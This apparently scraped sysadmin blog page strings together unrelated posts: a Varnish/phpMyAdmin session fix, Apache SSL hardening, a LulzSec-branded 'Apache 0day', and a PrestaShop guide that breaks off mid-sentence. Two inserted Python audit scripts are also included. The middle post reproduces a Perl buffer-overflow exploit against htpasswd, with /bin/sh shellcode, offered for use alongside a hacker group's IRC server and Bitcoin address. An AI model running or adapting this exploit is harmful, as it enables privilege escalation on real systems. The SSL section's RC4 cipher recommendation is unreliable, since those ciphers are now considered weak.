Varnish & phpmyadmin

Hi guys,

Hope all of you know about Varnish, the HTTP cache server. A very good and stable one.

But last week I had some issues configuring phpMyAdmin behind it.

The phpMyAdmin error was:

Cannot start session without errors, please check errors given in your PHP and/or webserver log file and configure your PHP installation properly.

Everywhere you'll find that this is an issue related to the session temp directory configuration. FALSE. THIS IS BULLSHIT.

Here is the solution:

First of all you need to set up Varnish so that the domain (or the phpMyAdmin directory) is not cached. I do this on a specific back-office subdomain for all my administration tasks (just restrict access to it by IP AND password in .htaccess, btw).

Here are the related rules:

sub vcl_fetch {

        # The placeholder is a host name, so it must be matched against the
        # Host header: req.url only holds the path and query string and
        # would never match a domain.
        if (req.http.host ~ "XXXX.YYYYYY.TLD") {
                return(pass);
        }
}
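Once the rule is in place you want to confirm that admin responses really bypass the cache. The following Python check is an added example, not part of the original post: it classifies Varnish responses from their headers and flags two conditions a defender cares about, an admin response that was served as a cache hit, and any cache hit that carries Set-Cookie (one user's session cookie handed out to everyone). It assumes the Varnish 2.x/3.x header conventions (`X-Varnish` carries one transaction id on a miss or pass and two on a hit, `Age` is the seconds the object spent in cache), and the `/phpmyadmin` path prefix is an assumption, since the post never names the directory. The sample headers are constructed, not captured from a real site.

```python
"""Audit Varnish responses for admin pages served from cache (added example)."""

ADMIN_HOST = "XXXX.YYYYYY.TLD"      # placeholder host name taken from the post
ADMIN_PATH_PREFIX = "/phpmyadmin"   # assumed directory, not given on the page


def is_admin_request(host, path):
    """Mirror of the bypass rule: the admin subdomain, or the phpMyAdmin directory."""
    return host.lower() == ADMIN_HOST.lower() or path.startswith(ADMIN_PATH_PREFIX)


def classify_varnish_response(headers):
    """Return 'hit', 'pass_or_miss' or 'no_varnish' for a response header dict.

    Assumed Varnish 2.x/3.x behaviour: X-Varnish holds "<xid>" on a miss or pass and
    "<xid> <xid of cached object>" on a hit; Age is > 0 only for objects served
    from cache.
    """
    h = {k.lower(): v.strip() for k, v in headers.items()}
    if "x-varnish" not in h:
        return "no_varnish"
    if len(h["x-varnish"].split()) == 2:
        return "hit"
    try:
        age = int(h.get("age", "0"))
    except ValueError:
        age = 0
    return "hit" if age > 0 else "pass_or_miss"


def audit(samples):
    """samples: iterable of (host, path, headers). Returns a list of findings (empty = clean)."""
    findings = []
    for host, path, headers in samples:
        verdict = classify_varnish_response(headers)
        names = {k.lower() for k in headers}
        if verdict == "hit" and is_admin_request(host, path):
            findings.append(f"{host}{path}: admin response served from cache")
        if verdict == "hit" and "set-cookie" in names:
            findings.append(f"{host}{path}: cached response carries Set-Cookie")
    return findings


# Constructed sample responses: a normal public hit, a correctly passed admin
# request, and an admin request that the bypass rule failed to catch.
SAMPLES = [
    ("www.example.com", "/",
     {"X-Varnish": "1234 1200", "Age": "37"}),
    ("XXXX.YYYYYY.TLD", "/phpmyadmin/index.php",
     {"X-Varnish": "1235", "Age": "0", "Set-Cookie": "phpMyAdmin=abc"}),
    ("www.example.com", "/phpmyadmin/index.php",
     {"X-Varnish": "1236 1201", "Age": "5", "Set-Cookie": "phpMyAdmin=def"}),
]

if __name__ == "__main__":
    for finding in audit(SAMPLES) or ["no findings"]:
        print(finding)
```

Feed `audit()` with headers collected from your own admin URLs (for example with `curl -sI`); a clean run returns an empty list, and the third constructed sample shows what a missed bypass looks like.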

Then you'll have to configure your phpMyAdmin directory. The software is not smart enough to understand that it runs behind Varnish, so it will try to redirect you to your backend server (which is, I HOPE, not reachable on a public address/port). So set the « $cfg['PmaAbsoluteUri'] » directive to your phpMyAdmin public internet URL.
Then set auth_type to « http ». The problem comes from « cookie » auth. I still haven't resolved that one, but at least this configuration works!

$i = 0;
$i++;
/* Authentication type */
$cfg['Servers'][$i]['auth_type'] = 'http';
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['compress'] = false;
/* Select mysql if your server does not have mysqli */
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['AllowNoPassword'] = false;
$cfg['PmaAbsoluteUri'] = 'http://XXXXXXXXXXX/';


HF dudez.


You may have heard about the new DDoS tool released by THC yesterday, exploiting an OLD CVE:

Here is how to protect yourself from the vulnerability:

Just edit your SSL configuration files (or all your vhost files, depending on your configuration) as follows:

# maximum certificate chain depth
SSLVerifyDepth 4
# or "require"
SSLVerifyClient none
# cipher suites used in the renegotiation
SSLCipherSuite RC4-SHA:RC4-MD5:HIGH:MEDIUM:!ADH:!DSS:!SSLv2:+3DES
# let's disable SSLv2
SSLProtocol all -SSLv2
# use the order we just set
SSLHonorCipherOrder on
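Before reloading Apache it is worth checking every vhost for the settings above. The following Python linter is an added example, not from the post: it parses an httpd config fragment and reports any vhost where SSLv2 is still enabled, the cipher suite does not exclude `ADH` or `SSLv2`, `SSLHonorCipherOrder` is not `on`, or a `#` comment sits at the end of a directive line (httpd does not support trailing comments and refuses to start on such a line). Both config samples are constructed for the example; the "good" one is the post's fragment written the way httpd accepts it.

```python
"""Lint mod_ssl directives in an httpd config fragment (added example)."""

# Constructed sample: the post's fragment with comments on their own lines.
GOOD_CONFIG = """\
<VirtualHost *:443>
    SSLEngine on
    # maximum certificate chain depth
    SSLVerifyDepth 4
    # or "require" when client certificates are mandatory
    SSLVerifyClient none
    SSLCipherSuite RC4-SHA:RC4-MD5:HIGH:MEDIUM:!ADH:!DSS:!SSLv2:+3DES
    SSLProtocol all -SSLv2
    SSLHonorCipherOrder on
</VirtualHost>
"""

# Constructed counter-example: a trailing comment httpd rejects, plus weak settings
# so that every check below fires at least once.
BAD_CONFIG = """\
SSLVerifyDepth 4 # max number of depth
SSLCipherSuite HIGH:MEDIUM:+3DES
SSLProtocol all
SSLHonorCipherOrder off
"""


def parse_directives(text):
    """Split a config fragment into (lineno, name, [args]) triples.

    Blank lines, full-line comments and <Section> tags are skipped. A '#' inside a
    directive line is reported, because httpd treats it as an argument, not a comment.
    """
    directives, problems = [], []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("<"):
            continue
        if "#" in line:
            problems.append(f"line {n}: trailing '#' comment on a directive line (httpd rejects it)")
            line = line.split("#", 1)[0].strip()
            if not line:
                continue
        name, *args = line.split()
        directives.append((n, name, args))
    return directives, problems


def lint_ssl_config(text):
    """Return a list of findings for the mod_ssl settings the post recommends; [] means clean."""
    directives, problems = parse_directives(text)
    by_name = {name.lower(): args for _, name, args in directives}

    proto = [t.lower() for t in by_name.get("sslprotocol", [])]
    if not proto:
        problems.append("SSLProtocol missing")
    elif ("all" in proto or "sslv2" in proto or "+sslv2" in proto) and "-sslv2" not in proto:
        problems.append("SSLProtocol leaves SSLv2 enabled")

    # SSLCipherSuite takes one colon-separated OpenSSL cipher string.
    suite = ":".join(by_name.get("sslciphersuite", [])).upper().split(":")
    for excluded in ("!ADH", "!SSLV2"):
        if excluded not in suite:
            problems.append(f"SSLCipherSuite does not exclude {excluded[1:]}")

    order = [t.lower() for t in by_name.get("sslhonorcipherorder", [])]
    if order != ["on"]:
        problems.append("SSLHonorCipherOrder is not 'on' (the client picks the cipher)")

    verify = [t.lower() for t in by_name.get("sslverifyclient", [])]
    if verify and verify[0] not in ("none", "optional", "require", "optional_no_ca"):
        problems.append(f"SSLVerifyClient has an unknown value {verify[0]!r}")

    depth = by_name.get("sslverifydepth", [])
    if depth and not depth[0].isdigit():
        problems.append("SSLVerifyDepth must be an integer")
    return problems


if __name__ == "__main__":
    for label, cfg in (("good", GOOD_CONFIG), ("bad", BAD_CONFIG)):
        print(label, lint_ssl_config(cfg) or "clean")
```

Run it over each vhost file with `lint_ssl_config(open(path).read())`; the trailing-comment check alone catches the most common reason `apachectl configtest` fails after this kind of edit.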


Have fun patching your Apache configuration files!

Today the famous group just released one of the many 0days they're using:

Here is the code :)

IRC: irc.lulzco.org (channel #LulzSec | port 6697 for SSL)
BitCoin donations: 176LRX4WRWD5LWDMbhr94ptb2MW9varCZP
Twitter: @LulzSec
Contact us: 614-LULZSEC
. /$$                 /$$            /$$$$$$                    
.| $$                | $$           /$$__  $$                    
.| $$       /$$   /$$| $$ /$$$$$$$$| $$  \__/  /$$$$$$   /$$$$$$$
.| $$      | $$  | $$| $$|____ /$$/|  $$$$$$  /$$__  $$ /$$_____/
.| $$      | $$  | $$| $$   /$$$$/  \____  $$| $$$$$$$$| $$      
.| $$      | $$  | $$| $$  /$$__/   /$$  \ $$| $$_____/| $$      
.| $$$$$$$$|  $$$$$$/| $$ /$$$$$$$$|  $$$$$$/|  $$$$$$$|  $$$$$$.$
.|________/ \______/ |__/|________/ \______/  \_______/ \_______/
                          //Laughing at your security since 2011!
.--    .-""-.
.   ) (     )
.  (   )   (
.     /     )
.    (_    _)                     0_,-.__
.      (_  )_                     |_.-._/
.       (    )                    |lulz..\    
.        (__)                     |__--_/          
.     |''   ``\                   |
.     | [Lulz] \                  |      /b/
.     |         \  ,,,---===?A`\  |  ,==y'
.   ___,,,,,---==""\        |M] \ | ;|\ |>
.           _   _   \   ___,|H,,---==""""bno,
.    o  O  (_) (_)   \ /          _     AWAW/
.                     /         _(+)_  dMM/
.      \@_,,,,,,---=="   \      \\|//  MW/
.--''''"                         ===  d/
.                                    //   SET SAIL FOR FAIL!
.                                    ,'_________________________
.   \    \    \     \               ,/~~~~~~~~~~~~~~~~~~~~~~~~~~~
.                         _____    ,'  ~~~   .-""-.~~~~~~  .-""-.
.      .-""-.           ///==---   /`-._ ..-'      -.__..-'
.            `-.__..-' =====\\\\\\ V/  .---\.
.                     ~~~~~~~~~~~~, _',--/_.\  .-""-.
.                            .-""-.___` --  \|         -.__..-

Greetings Lulz Lizards, it is finally time we released our 0 day apache exploit, use the cannons swiftly and let our enemies be overwhelmed with our Lulz!

===========================================

#!/usr/bin/perl 
# 0 Day Apache Exploit
# LulzSecurity #AntiSec

$shellcode = "\x31\xdb\x6a\x17\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68". 
"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; 


$target = "/usr/local/apache/bin/htpasswd"; 
$retaddr = 0xbffffffa - length($shellcode) - length($target); 


print "using retaddr = 0x", sprintf('%lx',($retaddr)), "\r\n"; 


local($ENV{'XXX'}) = $shellcode; 
$newret = pack('l', $retaddr); 
$buffer = "A" x 272; 
$buffer .= $newret x 4; 
$buffer .= " "; 
$buffer .= "B" x 290; 


exec("$target -nb $buffer");

[link to french version below]

PrestaShop is an e-commerce solution known for its many deployments around the world. Because it is written in PHP with object-oriented programming, it is easily customizable by ordinary programmers, hackers or integrators.

Install mod_rewrite

Before anything else, you will have to check whether the mod_rewrite module is installed on your Apache. You can see that with a simple phpinfo().

If it is not installed, type (as root):
